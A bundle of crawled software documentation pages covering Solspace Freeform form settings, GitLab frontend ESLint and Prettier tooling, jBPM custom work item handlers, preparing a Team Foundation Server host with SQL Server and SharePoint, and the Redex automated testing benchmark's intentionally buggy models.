When you first create a form, the Property Editor (right column) will display the overall settings for your form. You can get back here to adjust these details at any time by clicking the Form Settings button.
- Status - The default status to be used when users submit the form, unless overwritten at template level. See the Statuses documentation for managing statuses.
- Return URL - The URL that the form will redirect to after a successful submit. It may contain {{ form.handle }} and/or {{ submission.id }} to parse the newly created unique submission ID in the URL. This would allow you to use the freeform.submissions template function to display some or all of the user's submission on the success page (see the sketch at the end of this page).
Layout (center column)
The center column is where all the magic happens. It's where you can actively see an interactive live preview of what your form will look like. You can add up to 9 pages for each form.
Property Editor (right column)
The Property Editor controls every aspect of your form. Clicking on any field, page tab or the form settings button inside the Composer layout area will load its configuration options here.
CRM API Integrations
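To make the Return URL setting under Form Settings above concrete, here is a rough Twig sketch; the exact freeform.submissions parameters and the way the submission ID is read back are assumptions, so check the template function reference for your Freeform version:

{# Return URL configured in Composer, e.g.: /{{ form.handle }}/success/{{ submission.id }} #}

{# success page template: look up the submission whose ID ended up in the URL #}
{% set submission = freeform.submissions({ id: craft.app.request.getSegment(3) }).one() %}
{% if submission %}
  <p>Thanks! Your reference number is {{ submission.id }}.</p>
{% endif %}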
https://docs.solspace.com/craft/freeform/v1/overview/forms-composer.html
2020-11-24T04:14:36
CC-MAIN-2020-50
1606141171077.4
[array(['/assets/img/cp_forms.5eb3bb10.png', 'Forms'], dtype=object) array(['/assets/img/cp_forms-composer-contact.5e0a8a62.png', 'Composer - Contact Form'], dtype=object) array(['/assets/img/cp_forms-composer-dragdrop.3ad5c898.png', 'Composer - Drag & Drop'], dtype=object) array(['/assets/img/cp_forms-composer-multipage.5af168e7.png', 'Composer - Multi-page'], dtype=object) array(['/assets/img/cp_forms-composer-mailinglist.33136dd5.png', 'Composer - Mailing List'], dtype=object) ]
docs.solspace.com
Tooling
ESLint
We use ESLint to encapsulate and enforce frontend code standards. Our configuration may be found in the gitlab-eslint-config project.
Yarn Script
This section describes yarn scripts that are available to validate and apply automatic fixes to files using ESLint. To check all currently staged files (based on git diff) with ESLint, run the following script:
yarn eslint-staged
A list of problems found will be logged to the console. To apply automatic ESLint fixes to all currently staged files (based on git diff), run the following script:
yarn eslint-staged-fix
If manual changes are required, a list of changes will be sent to the console. To check all files in the repository with ESLint, run the following script:
yarn eslint
A list of problems found will be logged to the console. To apply automatic ESLint fixes to all files in the repository, run the following script:
yarn eslint-fix
If manual changes are required, a list of changes will be sent to the console.
Disabling ESLint in new files
Do not disable ESLint when creating new files. Existing files may have existing rules disabled due to legacy compatibility reasons, but they are in the process of being refactored. Do not disable specific ESLint rules. To avoid introducing technical debt, you may disable the following rules only if you are invoking/instantiating existing code modules. Disable these rules on a per-line basis. This makes it easier to refactor in the future. For example, use eslint-disable-next-line or eslint-disable-line.
Disabling ESLint for a single violation
If you do need to disable a rule for a single violation, disable it for the smallest amount of code necessary:
// bad
/* eslint-disable no-new */
import Foo from 'foo';
new Foo();
// better
import Foo from 'foo';
// eslint-disable-next-line no-new
new Foo();
The no-undef rule and declaring globals
Never disable the no-undef rule. Declare globals with /* global Foo */ instead. When declaring multiple globals, always use one /* global [name] */ line per variable.
// bad
/* globals Flash, Cookies, jQuery */
// good
/* global Flash */
/* global Cookies */
/* global jQuery */
Formatting with Prettier
Support for .graphql introduced in GitLab 13.2. Our code is automatically formatted with Prettier to follow our style guides. Prettier takes care of formatting .js, .vue, .graphql, and .scss files based on the standard prettier rules. You can find all settings for Prettier in .prettierrc.
Editor
The recommended method to include Prettier in your workflow is to set up your preferred editor (all major editors are supported) accordingly. We suggest setting up Prettier to run when each file is saved. For instructions about using Prettier in your preferred editor, see the Prettier documentation. Please take care that you only let Prettier format the same file types as the global Yarn script does (.js, .vue, .graphql, and .scss). In VS Code, for example, you can easily exclude file formats in your settings file:
"prettier.disableLanguages": [ "json", "markdown" ]
Yarn Script
The following yarn scripts are available to do global formatting:
yarn prettier-staged-save Updates all currently staged files (based on git diff) with Prettier and saves the needed changes.
yarn prettier-staged Checks all currently staged files (based on git diff) with Prettier and logs which files would need manual updating to the console.
yarn prettier-all Checks all files with Prettier and logs which files need manual updating to the console.
yarn prettier-all-save Formats all files in the repository with Prettier. (This should only be used to test global rule updates; otherwise you would end up with huge MRs.)
The source of these Yarn scripts can be found in /scripts/frontend/prettier.js.
Scripts during Conversion period
node ./scripts/frontend/prettier.js check-all ./vendor/
This will go over all files in a specific folder and check them.
node ./scripts/frontend/prettier.js save-all ./vendor/
This will go over all files in a specific folder and save them.
VSCode Settings
Select Prettier as default formatter
To select Prettier as a formatter, add the following properties to your User or Workspace Settings:
{
  "[html]": { "editor.defaultFormatter": "esbenp.prettier-vscode" },
  "[javascript]": { "editor.defaultFormatter": "esbenp.prettier-vscode" },
  "[vue]": { "editor.defaultFormatter": "esbenp.prettier-vscode" },
  "[graphql]": { "editor.defaultFormatter": "esbenp.prettier-vscode" }
}
Format on Save
To automatically format your files with Prettier, add the following properties to your User or Workspace Settings:
{
  "[html]": { "editor.formatOnSave": true },
  "[javascript]": { "editor.formatOnSave": true },
  "[vue]": { "editor.formatOnSave": true },
  "[graphql]": { "editor.formatOnSave": true }
}
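For reference, the .prettierrc file mentioned above is a small JSON document; the values below are placeholders to show its shape, not necessarily the settings used in the GitLab repository:

{
  "printWidth": 100,
  "singleQuote": true,
  "arrowParens": "always",
  "trailingComma": "es5"
}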
https://docs.gitlab.com/ee/development/fe_guide/tooling.html
2020-11-24T03:57:30
CC-MAIN-2020-50
1606141171077.4
[]
docs.gitlab.com
With regards to a BPMN2 process, custom work items are certain types of <task> nodes. In most cases, custom work items are <task> nodes in a BPMN2 process definition, although they can also be used with certain other task type nodes such as, among others, <serviceTask> or <sendTask> nodes. When creating custom work items, it's important to separate the data associated with the work item from how the work item should be handled. In other words, separate the what from the how. That means that custom work items should describe the what, while custom work item handlers, which are Java classes, implement the how; work item handlers should almost never contain any data. Users can thus easily define their own set of domain-specific service nodes and integrate them with the process language. For example, the next figure shows an example of a healthcare-related BPMN2 process. The process includes domain-specific service nodes for measuring blood pressure, prescribing medication, notifying care providers and following up on the patient. Before moving on to an example, this section explains what custom work items and custom work item handlers are. In short, we use the term custom work item when we're describing a node in your process that represents a domain-specific task and, as such, contains extra properties and is handled by a WorkItemHandler implementation. Because it's a domain-specific task, a custom work item is equivalent to a <task> or <task>-type node in BPMN2. However, a WorkItem is also a Java class instance that's used when a WorkItemHandler instance is called to complete the task or work item. Depending on the BPMN2 editor you're using, you can create a custom work item definition in one of two ways, configuring a <task> or <task>-type element to work with WorkItemHandler implementations. See the ??? section in the ??? chapter. A work item handler is a Java class used to execute (or abort) work items. That also means that the class implements the org.kie.api.runtime.process.WorkItemHandler interface. While jBPM provides some custom WorkItemHandler instances (listed below), a Java developer with a minimal knowledge of jBPM can easily create a new work item handler class with its own custom business logic. Among others, jBPM offers the following WorkItemHandler implementations: in the jbpm-bpmn2 module, org.jbpm.bpmn2.handler package, handlers for <receiveTask>, <sendTask> and <serviceTask> nodes; and in the jbpm-workitems module, handlers in various packages under the org.jbpm.process.workitem package. There are many more WorkItemHandler implementations present in the jbpm-workitems module. If you're looking for specific integration logic with Twitter, for example, we recommend you take a look at the classes made available there. In general, a WorkItemHandler's .executeWorkItem(...) and .abortWorkItem(...) methods will do the following: extract the information about the task being executed (or aborted) from the WorkItem instance, execute the necessary business logic, and then inform the WorkItemManager instance passed to the method that the work item has been completed or aborted, using WorkItemManager.completeWorkItem(long workItemId, Map<String, Object> results) or WorkItemManager.abortWorkItem(long workItemId). In order to make sure that your custom work item handler is used for a particular process instance, it's necessary to register the work item handler before starting the process. This makes the engine aware of your WorkItemHandler so that the engine can use it for the proper node. For example:

ksession.getWorkItemManager().registerWorkItemHandler("Notification", new NotificationWorkItemHandler());

The ksession variable above is a StatefulKnowledgeSession (and also a KieSession) instance.
The example code above comes from the example that we will go through in the next section. You can use different work item handlers for the same process depending on the system on which it runs: by registering different work item handlers on different systems, you can customize how a custom work item is processed on a particular system. You can also substitute mock WorkItemHandler instances when testing. Let's start by showing you how to include a simple work item for sending notifications. A work item is defined by a unique name and includes additional parameters that describe the work in more detail. Work items can also return information after they have been executed, specified as results. Our notification work item could be defined using a work definition with four parameters and no results. In our example we will create an MVEL work item definition that defines a "Notification" work item; MVEL is the default format for such definitions. This file will be placed in the project classpath in a directory called META-INF. The work item configuration file for this example, MyWorkDefinitions.wid, will look like this:

import org.drools.core.process.core.datatype.impl.type.StringDataType;
[
  [
    "name" : "Notification",
    "parameters" : [
      "Message" : new StringDataType(),
      "From" : new StringDataType(),
      "To" : new StringDataType(),
      "Priority" : new StringDataType(),
    ],
    "displayName" : "Notification",
    "icon" : "icons/notification.gif"
  ]
]

The project directory structure could then look something like this:

project/src/main/resources/META-INF/MyWorkDefinitions.wid

We also want to add a specific icon to be used in the process editor with the work item. To add this, you will need .gif or .png images with a pixel size of 16x16. We put them in a directory outside of the META-INF directory, for example, here:

project/src/main/resources/icons/notification.gif

The jBPM Eclipse editor uses the configuration mechanisms supplied by Drools to register work item definition files. That means adding a drools.workDefinitions property to the drools.rulebase.conf file in the META-INF directory. The drools.workDefinitions property represents a list of files containing work item definitions, separated using spaces. If you want to exclude all other work item definitions and only use your definition, you could use the following:

drools.workDefinitions = MyWorkDefinitions.wid

However, if you only want to add the newly created node definition to the existing palette nodes, you can define the drools.workDefinitions property as follows:

drools.workDefinitions = MyWorkDefinitions.wid WorkDefinitions.conf

We recommend that you use the extension .wid for your own definitions of domain-specific nodes. The .conf extension is used with the default definition file, WorkDefinitions.conf, for backward compatibility reasons. We've created our work item definition and configured it, so now we can start using it in our processes. Besides any custom properties, the following three properties are available for all work items: Parameter Mapping: Allows you to map the value of a process variable to a parameter of the work item. Here is an example that creates a domain-specific node to execute Java, asking for the class and method parameters.
It includes a custom java.gif icon and consists of the following files and resulting screenshot:

import org.drools.core.process.core.datatype.impl.type.StringDataType;
[
  // the Java Node work item located in:
  // project/src/main/resources/META-INF/JavaNodeDefinition.wid
  [
    "name" : "JavaNode",
    "parameters" : [
      "class" : new StringDataType(),
      "method" : new StringDataType(),
    ],
    "displayName" : "Java Node",
    "icon" : "icons/java.gif"
  ]
]

// located in: project/src/main/resources/META-INF/drools.rulebase.conf
drools.workDefinitions = JavaNodeDefinition.wid WorkDefinitions.conf

// icon for java.gif located in:
// project/src/main/resources/icons/java.gif

Once we've created our Notification work item definition (see the sections above), we can then create a custom implementation of a work item handler that will contain the logic to send the notification. In order to execute our Notification work items, we first create a NotificationWorkItemHandler that implements the WorkItemHandler interface:

package com.sample;

import org.kie.api.runtime.process.WorkItem;
import org.kie.api.runtime.process.WorkItemHandler;
import org.kie.api.runtime.process.WorkItemManager;

public class NotificationWorkItemHandler implements WorkItemHandler {

  public void executeWorkItem(WorkItem workItem, WorkItemManager manager) {
    // read the parameters defined in the work item definition
    String from = (String) workItem.getParameter("From");
    String to = (String) workItem.getParameter("To");
    String message = (String) workItem.getParameter("Message");
    // ... send the notification email here ...

    // notify the manager that the work item has been completed
    manager.completeWorkItem(workItem.getId(), null);
  }

  public void abortWorkItem(WorkItem workItem, WorkItemManager manager) {
    // Do nothing, notifications cannot be aborted
  }
}

This WorkItemHandler sends a notification as an email and then notifies the WorkItemManager that the work item has been completed. In some situations a work item may need to be aborted before it has been completed; the WorkItemHandler.abortWorkItem(...) method can be used to specify how to abort such work items. Remember, if the WorkItemManager is not notified about the completion, the process engine will never be notified that your service node has completed. WorkItemHandler instances need to be registered with the WorkItemManager in order to be used. In this case, we need to register an instance of our NotificationWorkItemHandler in order to use it with our process containing a Notification work item. We can do that like this:

StatefulKnowledgeSession ksession = kbase.newStatefulKnowledgeSession();
ksession.getWorkItemManager().registerWorkItemHandler(
  "Notification",
  new NotificationWorkItemHandler()
);

If we were to look at the BPMN2 syntax for our process with the Notification work item, we would see something like the following example. Note the use of the tns:taskName attribute in the <task> node. This is necessary for the WorkItemManager to be able to see which WorkItemHandler instance should be used with which task or work item.

<?xml version="1.0" encoding="UTF-8"?>
<definitions id="Definition"
             xmlns=""
             xs:schemaLocation=" BPMN20.xsd"
             ...
             xmlns: ...

  <process isExecutable="true" id="myCustomProcess" name="Domain-Specific Process" >
    ...
    <task id="_5" name="Notification Task" tns:taskName="Notification" ...
    ...

Different work item handlers could be used depending on the context. For example, during testing or simulation, it might not be necessary to actually execute the work items. In this case specialized dummy work item handlers could be used during testing. A lot of these domain-specific services are generic, and can be reused by a lot of different users. Think for example about integration with Twitter, doing file system operations or sending email. Once such a domain-specific service has been created, you might want to make it available to other users so they can easily import and start using it. A service repository allows you to import services by browsing the repository looking for services you might need and importing these services into your workspace.
These will then automatically be added to your palette and you can start using them in your processes. You can also import additional artefacts like for example an icon, any dependencies you might need, a default handler that will be used to execute the service (although you're always free to override the default, for example for testing), etc. To browse the repository, open the wizard to import services, point it to the right location (this could be to a directory in your file system but also a public or private URL) and select the services you would like to import. For example, in Eclipse, right-click your project that contains your processes and select "Configure ... -> Import jBPM services ...". This will open up a repository browser. In the URL field, fill in the URL of your repository (see below for the URL of the public jBPM repository that hosts some common service implementations out-of-the-box), or use the "..." button to browse to a folder on your file system. Click the Get button to retrieve the contents of that repository. Select the service you would like to import and then click the Import button. Note that the Eclipse wizard allows you to define whether you would like to automatically configure the service (so it shows up in the palette of your processes), whether you would also like to download any dependencies that might be needed for executing the service and/or whether you would like to automatically register the default handler, so make sure to mark the right checkboxes before importing your service (if you are unsure what to do, leaving all check boxes marked is probably best). After importing your service, (re)open your process diagram and the new service should show up in your palette and you can start using it in your process. Note that most services also include documentation on how to use them (e.g. what the different input and output parameters are) when you select them browsing the service repository. Click on the image below to see a screencast where we import the twitter service in a new jBPM project and create a simple process with it that sends an actual tweet. Note that you need the necessary twitter keys and secrets to be able to programatically send tweets to your twitter account. How to create these is explained here, but once you have these, you can just drop them in your project using a simple configuration file. Figure 21.1. We are building a public service repository that contains predefined services that people can use out-of-the-box if they want to: This repository contains some integrations for common services like Twitter integration or file system operations that you can import. Simply point the import wizard to this URL to start browsing the repository. If you have an implementation of a common service that you would like to contribute to the community, do not hesitate to contact someone from the development team. We are always looking for contributions to extend our repository. You can set up your own service repository and add your own services by creating a configuration file that contains the necessary information (this is an extended version of the normal work definition configuration file as described earlier in this chapter) and putting the necessary files (like an icon, dependencies, documentation, etc.) in the right folders. The extended configuration file contains the normal properties (like name, parameters, results and icon), with some additional ones. 
For example, the following extended configuration file describes the Twitter integration service (as shown in the screencast above):

import org.drools.core.process.core.datatype.impl.type.StringDataType;
[
  [
    "name" : "Twitter",
    "description" : "Send a twitter message",
    "parameters" : [
      "Message" : new StringDataType()
    ],
    "displayName" : "Twitter",
    "eclipse:customEditor" : "org.drools.eclipse.flow.common.editor.editpart.work.SampleCustomEditor",
    "icon" : "twitter.gif",
    "category" : "Communication",
    "defaultHandler" : "org.jbpm.process.workitem.twitter.TwitterHandler",
    "documentation" : "index.html",
    "dependencies" : [
      "file:./lib/jbpm-twitter.jar",
      "file:./lib/twitter4j-core-2.2.2.jar"
    ]
  ]
]

The defaultHandler property refers to the default handler implementation, i.e. the Java class that implements the WorkItemHandler interface and can be used to execute the service. This can automatically be registered as the handler for that service when importing the service from the repository. The root of your repository should also contain an index.conf file that references all the folders that should be processed when searching for services on the repository. Each of those folders should then contain an extended configuration file for the service (for example Twitter.conf), together with the icon, dependencies and documentation it references. You can create your own hierarchical structure, because if one of those folders also contains an index.conf file, that will be used to scan additional sub-folders. Note that the hierarchical structure of the repository is not shown when browsing the repository using the import wizard, as the category property in the configuration file is used for that.
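As mentioned earlier, during testing or simulation you might not want work items to be executed for real, and a dummy handler can be registered in place of the real one. A minimal sketch of such a handler follows; the class name is ours, but the interface and the registration call are the ones shown above:

package com.sample;

import org.kie.api.runtime.process.WorkItem;
import org.kie.api.runtime.process.WorkItemHandler;
import org.kie.api.runtime.process.WorkItemManager;

// Stand-in for NotificationWorkItemHandler during tests: completes every
// notification work item immediately without sending anything.
public class MockNotificationWorkItemHandler implements WorkItemHandler {

  public void executeWorkItem(WorkItem workItem, WorkItemManager manager) {
    System.out.println("Skipping notification to " + workItem.getParameter("To"));
    manager.completeWorkItem(workItem.getId(), null);
  }

  public void abortWorkItem(WorkItem workItem, WorkItemManager manager) {
    // nothing to clean up for the mock
  }
}

// Registered under the same name, so the process definition stays unchanged:
// ksession.getWorkItemManager().registerWorkItemHandler("Notification", new MockNotificationWorkItemHandler());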
https://docs.jboss.org/jbpm/v6.0/userguide/jBPMDomainSpecificProcesses.html
2020-11-24T03:11:58
CC-MAIN-2020-50
1606141171077.4
[]
docs.jboss.org
Prepare the new hardware Azure DevOps Services | Azure DevOps Server 2019 | TFS 2018 - TFS 2013 Note: Azure DevOps Server was previously named Visual Studio Team Foundation Server. Use this topic to: - Choose hardware and name the server - Install SQL Server on the new server - Install SharePoint Foundation on the new server - Install Team Foundation Server Prerequisites To perform the procedures in this topic, you must be a member of the Administrators security group on the server where you want to install the software. Choose hardware and name the server Install SQL Server on the new server Tip: Most installations of SQL Server use the default collation settings. The default collation settings are determined by the Windows system locale on the server where you install SQL Server. To install SQL Server to support Team Foundation Server: Launch the SQL Server Installation Center. On the SQL Server Installation Center page, choose Installation, and then choose New installation or add features to an existing installation. On the Setup Support Rules page, verify that all rules have passed, and then choose OK. On the Product Key page, provide your product key, and then choose Next. On the License Terms page, review the license agreement. If you accept the terms, select I accept the license terms. Optionally, you can select the check box to send usage data to Microsoft, and then choose Next. On the Setup Support Files page, choose Install. On the Setup Support Rules page, review the setup information. Correct any failure conditions, and then choose Next. On the Setup Role page, choose SQL Server Feature Installation, and then choose Next. On the Feature Selection page, select the following check boxes, and then choose Next: - Database Engine Services - Full-Text Search - Analysis Services, if reporting was part of the deployment you want to restore - Reporting Services, if reporting was part of the deployment you want to restore - Client Tools Connectivity - Management Tools - Basic - Management Tools - Complete On the Installation Rules page, review any warnings and correct any failures, and then choose Next. On the Instance Configuration page, choose Default instance, and then choose Next. On the Disk Space Requirements page, review the information to make sure you have sufficient disk space, and then choose Next. On the Server Configuration page, choose Use the same account for all SQL Server services. In the Use the same account for all SQL Server services window, choose or specify NT AUTHORITY\NETWORK SERVICE, and then choose OK. In the Startup Type column, specify Automatic for all services that you can edit, and then choose Next. On the Database Engine Services page, on the Account Provisioning tab, choose Windows authentication mode and then choose Add Current User to add your account as an administrator for this instance of SQL Server. Optionally add any other user accounts for users you want to act as database administrators, and then choose Next. On the Analysis Services Configuration page, on the Account Provisioning tab, choose Add Current User to add your account as an administrator for the analysis services database. Optionally add any other user accounts for users you want to act as administrators, and then choose Next. On the Reporting Services Configuration page, choose Install the native mode default configuration, and then choose Next. On the Error Reporting page, choose whether to send information about errors to Microsoft, and then choose Next.
On the Installation Rules page, review any failures or warnings, and then choose Next. On the Ready to Install page, review the list of components to be installed, and if they match the list of features shown in the illustration below, then choose Install. If you need to make any changes, choose Back. On the Installation Progress page, optionally monitor the installation progress of each component. When all components have finished installing, the Complete page appears. Installing SharePoint Foundation on the new server Unlike a new installation of Team Foundation Server, you cannot use the installation wizard for TFS to install SharePoint Foundation for you. If you want to be able to restore the project portals and other information used in the SharePoint Foundation portion of your deployment, you must first install SharePoint Foundation manually, and then restore the farm. Use SharePoint Tools to install SharePoint Foundation. Use Windows PowerShell to install SharePoint Foundation: Install-SharePoint -SetupExePath "Drive:\SharePoint 2013\Setup\setup.exe" This installs SharePoint Foundation using a PID key in a farm deployment, but does not configure it or create any databases. Instead, you will restore the farm and its databases to this installation. Tip: As an alternative, you can choose to use a configuration XML file with the Install-SharePoint command to install SharePoint Foundation. For more information, see Install SharePoint Foundation by using Windows PowerShell. Install Team Foundation Server.
https://docs.microsoft.com/en-us/azure/devops/server/admin/backup/tut-single-svr-prep-new-hw?view=azure-devops-2020
2020-11-24T04:57:24
CC-MAIN-2020-50
1606141171077.4
[]
docs.microsoft.com
Hints for Selecting the Designer Eyeglasses You Will Purchase
To look more elegant, you will need to adopt a style that is different from the rest of the people. Designer eyeglasses can be worn to add elegance to the outfits that you have. It is up to you to know which designer eyeglasses to buy, as not all of them are best for you as an individual, and you have to use your own judgment to make better choices here. Considering friends' advice can be a great move when you have to determine which designer eyeglasses are right for you. If you follow these hints, there will be no need to purchase new glasses from time to time to replace the ones you bought earlier. Never purchase designer eyeglasses that are expensive thinking that they are automatically the highest-quality ones.
http://docs-prints.com/2020/09/19/why-no-one-talks-about-anymore-11/
2020-11-24T03:16:03
CC-MAIN-2020-50
1606141171077.4
[]
docs-prints.com
5 Automated Testing Benchmark Redex’s automated testing benchmark provides a collection of buggy models and falsifiable properties to test how efficiently methods of automatic test case generation are able to find counterexamples for the bugs. Each entry in the benchmark contains a check function and multiple generate functions. The check function determines if a given example is a counterexample (i.e. if it uncovers the buggy behavior) and each of the generate functions generates candidate examples to be tried. There are multiple ways to generate terms for each model. They typically correspond to different uses of generate-term, but could be any way to generate examples. See run-gen-and-check for the precise contracts for generate and check functions. Most of the entries in the benchmark are small differences to existing, bug-free models, where some small change to the model introduces the bug. These changes are described using define-rewrite. To run a benchmark entry with a particular generator, see run-gen-and-check/mods. 5.1 The Benchmark Models The programs in our benchmark come from two sources: synthetic examples based on our experience with Redex over the years and from models that we and others have developed and bugs that were encountered during the development process. The benchmark has six different Redex models, each of which provides a grammar of terms for the model and a soundness property that is universally quantified over those terms. Most of the models are of programming languages and most of the soundness properties are type-soundness, but we also include red-black trees with the property that insertion preserves the red-black invariant, as well as one richer property for one of the programming language models (discussed in stlc-sub). For each model, we have manually introduced bugs into a number of copies of the model, such that each copy is identical to the correct one, except for a single bug. The bugs always manifest as a term that falsifies the soundness property. The table in figure 1 gives an overview of the benchmark suite, showing some numbers for each model and bug. Each model has its name and the number of lines of code for the bug-free model (the buggy versions are always within a few lines of the originals). The line number counts include the model and the specification of the property. Each bug has a number and, with the exception of the rvm model, the numbers count from 1 up to the number of bugs. The rvm model bugs are all from Klein et al. (2013)’s work and we follow their numbering scheme (see rvm for more information about how we chose the bugs from that paper). S (Shallow) Errors in the encoding of the system into Redex, due to typos or a misunderstanding of subtleties of Redex. M (Medium) Errors in the algorithm behind the system, such as using too simple of a data-structure that doesn’t allow some important distinction, or misunderstanding that some rule should have a side-condition that limits its applicability. D (Deep) Errors in the developer’s understanding of the system, such as when a type system really isn’t sound and the author doesn’t realize it. U (Unnatural) Errors that are unlikely to have come up in real Redex programs but are included for our own curiosity. There are only two bugs in this category. The size column shows the size of the term representing the smallest counterexample we know for each bug, where we measure size as the number of pairs of parentheses and atoms in the s-expression representation of the term. 
Each subsection of this section introduces one of the models in the benchmark, along with the errors we introduced into each model.
Figure 1: Benchmark Overview
5.1.1 stlc A simply-typed λ-calculus with base types of numbers and lists of numbers, including the constants +, which operates on numbers, and cons, head, tail, and nil (the empty list), all of which operate only on lists of numbers. The property checked is type soundness: the combination of preservation (if a term has a type and takes a step, then the resulting term has the same type) and progress (that well-typed non-values always take a reduction step). We introduced nine different bugs into this system. The first confuses the range and domain types of the function in the application rule, and has the small counterexample: (hd 0). We consider this to be a shallow bug, since it is essentially a typo and it is hard to imagine anyone with any knowledge of type systems making this conceptual mistake. Bug 2 neglects to specify that a fully applied cons is a value, thus the list ((cons 0) nil) violates the progress property. We consider this to be a medium bug, as it is not a typo, but an oversight in the design of a system that is otherwise correct in its approach. We consider the next three bugs to be shallow. Bug 3 reverses the range and the domain of function types in the type judgment for applications. This was one of the easiest bugs for all of our approaches to find. Bug 4 assigns cons a result type of int. The fifth bug returns the head of a list when tl is applied. Bug 6 only applies the hd constant to a partially constructed list (i.e., the term (cons 0) instead of ((cons 0) nil)). Only the grammar based random generation exposed bugs 5 and 6 and none of our approaches exposed bug 4. The seventh bug, also classified as medium, omits a production from the definition of evaluation contexts and thus doesn't reduce the right-hand-side of function applications. Bug 8 always returns the type int when looking up a variable's type in the context. This bug (and the identical one in the next system) are the only bugs we classify as unnatural. We included it because it requires a program to have a variable with a type that is more complex than just int and to actually use that variable somehow. Bug 9 is simple; the variable lookup function has an error where it doesn't actually compare its input to the variable in the environment, so it effectively means that each variable has the type of the nearest enclosing lambda expression.
5.1.2 poly-stlc This is a polymorphic version of stlc, with a single numeric base type, polymorphic lists, and polymorphic versions of the list constants. No changes were made to the model except those necessary to make the list operations polymorphic. There is no type inference in the model, so all polymorphic terms are required to be instantiated with the correct types in order for the function to type check. Of course, this makes it much more difficult to automatically generate well-typed terms, and thus counterexamples. As with stlc, the property checked is type soundness. All of the bugs in this system are identical to those in stlc, aside from any changes that had to be made to translate them to this model. This model is also a subset of the language specified in Pałka et al. (2011), who used a specialized and optimized QuickCheck generator for a similar type system to find bugs in GHC.
We adapted this system (and its restriction in stlc) because it has already been used successfully with random testing, which makes it a reasonable target for an automated testing benchmark. 5.1.3 stlc-sub The same language and type system as stlc, except that in this case all of the errors are in the substitution function. Our own experience has been that it is easy to make subtle errors when writing substitution functions, so we added this set of tests specifically to target them with the benchmark. There are two soundness checks for this system. Bugs 1-5 are checked in the following way: given a candidate counterexample, if it type checks, then all βv-redexes in the term are reduced (but not any new ones that might appear) using the buggy substitution function to get a second term. Then, these two terms are checked to see if they both still type check and have the same type and that the result of passing both to the evaluator is the same. Bugs 4-9 are checked using type soundness for this system as specified in the discussion of the stlc model. We included two predicates for this system because we believe the first to be a good test for a substitution function but not something that a typical Redex user would write, while the second is something one would see in most Redex models but is less effective at catching bugs in the substitution function. The first substitution bug we introduced simply omits the case that replaces the correct variable with the term to be substituted. We considered this to be a shallow error, and indeed all approaches were able to uncover it, although the time it took to do so varied. Bug 2 permutes the order of arguments when making a recursive call. This is also categorized as a shallow bug, although it is a common one, at least based on our experience writing substitutions in Redex. Bug 3 swaps the function and argument positions of an application while recurring, again essentially a typo and a shallow error, although one of the more difficult to find in this model. The fourth substitution bug neglects to make the renamed bound variable fresh enough when recurring past a lambda. Specifically, it ensures that the new variable is not one that appears in the body of the function, but it fails to make sure that the variable is different from the bound variable or the substituted variable. We categorized this error as deep because it corresponds to a misunderstanding of how to generate fresh variables, a central concern of the substitution function. Bug 5 carries out the substitution for all variables in the term, not just the given variable. We categorized it as SM, since it is essentially a missing side condition, although a fairly egregious one. Bugs 6-9 are duplicates of bugs 1-3 and bug 5, except that they are tested with type soundness instead. (It is impossible to detect bug 4 with this property.) 5.1.4 let-poly A language with ML-style let polymorphism, included in the benchmark to explore the difficulty of finding the classic let+references unsoundness. With the exception of the classic bug, all of the bugs were errors made during the development of this model (and that were caught during development). The first bug is simple; it corresponds to a typo, swapping an x for a y in a rule such that a type variable is used as a program variable. Bug number 2 is the classic let+references bug. It changes the rule for let-bound variables in such a way that generalization is allowed even when the initial value expression is not a value. 
Bug number 3 is an error in the function application case where the wrong types are used for the function position (swapping two types in the rule). Bugs 4, 5, and 6 were errors in the definition of the unification function that led to various bad behaviors. Finally, bug 7 is a bug that was introduced early on, but was only caught late in the development process of the model. It used a rewriting rule for let expressions that simply reduced them to the corresponding ((λ ...) ...) application expressions. This has the correct semantics for evaluation, but the statement of type-soundness does not work with this rewriting rule because the let expression has more polymorphism than the corresponding application expression.
5.1.5 list-machine An implementation of Appel et al. (2012)'s list-machine benchmark. This is a reduction semantics (as a pointer machine operating over an instruction pointer and a store) and a type system for a seven-instruction first-order assembly language that manipulates cons and nil values. The property checked is type soundness as specified in Appel et al. (2012), namely that well-typed programs always step or halt. Three mutations are included. The first list-machine bug incorrectly uses the head position of a cons pair where it should use the tail position in the cons typing rule. This bug amounts to a typo and is classified as simple. The second bug is a missing side-condition in the rule that updates the store that has the effect of updating the first position in the store instead of the proper position in the store for all of the store update operations. We classify this as a medium bug. The final list-machine bug is a missing subscript in one rule that has the effect that the list cons operator does not store its result. We classify this as a simple bug.
5.1.6 rbtrees A model that implements the red-black tree insertion function and checks that insertion preserves the red-black tree invariant (and that the red-black tree is a binary search tree). The first bug simply removes the re-balancing operation from insert. We classified this bug as medium since it seems like the kind of mistake that a developer might make in staging the implementation. That is, the re-balancing operation is separate and so might be put off initially, but then forgotten. The second bug misses one situation in the re-balancing operation, namely when a black node has two red nodes under it, with the second red node to the right of the first. This is a medium bug. The third bug is in the function that counts the black depth in the red-black tree predicate. It forgets to increment the count in one situation. This is a simple bug.
5.1.7 delim-cont Takikawa et al. (2013)'s model of a contract and type system for delimited control. The language is Plotkin's PCF extended with operators for delimited continuations, continuation marks, and contracts for those operations. The property checked is type soundness. We added three bugs to this model. The first was a bug we found by mining the model's git repository's history. This bug fails to put a list contract around the result of extracting the marks from a continuation, which has the effect of checking the contract that is supposed to be on the elements of a list against the list itself instead. We classify this as a medium bug. The second bug was in the rule for handling list contracts.
When checking a contract against a cons pair, the rule didn't specify that it should apply only when the contract is actually a list contract, meaning that the cons rule would be used even on non-list contracts, leading to strange contract checking. We consider this a medium bug because the bug manifests itself as a missing list/c in the rule. The last bug in this model makes a mistake in the typing rule for the continuation operator. The mistake is to leave off one level of arrows, something that is easy to do with so many nested arrow types, as continuations tend to have. We classify this as a simple error.
